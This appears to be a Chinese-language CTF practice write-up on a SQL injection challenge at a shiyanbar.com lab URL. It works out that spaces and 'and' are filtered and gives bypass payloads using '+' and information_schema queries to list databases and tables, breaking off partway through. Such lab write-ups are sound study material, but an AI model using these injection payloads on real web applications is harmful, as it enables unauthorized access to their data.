这周日比赛，看去年的wp很多题注入，再练习一波吧。虽然看似简单，但是做起来确实实属费劲。或许是菜吧。

URL地址：

添加一个单引号报错如下：

<pre>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1</pre>

尝试闭合，使用两个单引号成功闭合。

http://ctf5.shiyanbar.com/423/web/?id=1'and sleep(3)'

发现不仅仅没有延时而且报错还有问题。

<pre>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1</pre>

 and不见了。可见and直接被替换为空了。

Fuzz一下看看过滤了那些

http://ctf5.shiyanbar.com/web/?id=1' and' 

回显是

<pre>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1</pre>

空格andd单引号都被替换为空了，但是单引号是很明显不拦截的。也就是说空格以后的他都没有执行。说明空格很可能是被过滤的。尝试空格替换为空

http://ctf5.shiyanbar.com/423/web/?id=1'+and'

这次就跟预期的一样了。因为1'+and'背身就要为null的。由此推出过滤了空格。

这里几乎可以猜测得到他的SQL语句大概是这样写的select username from user where id = '1';

坑1

尝试order by

根据猜测的注入语句来看是使用不了order by 的 

经过测试也确实如此。就不多BB了

然后直接跑所有库group_concat(schema_name)+from+information_schema.schemata

考虑到后面的单引号闭合。可以使用where+'1

group_concat(schema_name)+from+information_schema.schemata+where+'1

坑2

是查不了当下库的所有表的。也就是说你只能查所有表。

group_concat(table_name)+from+information_schema.tables+where+'1 是不能直接查当下库的表的。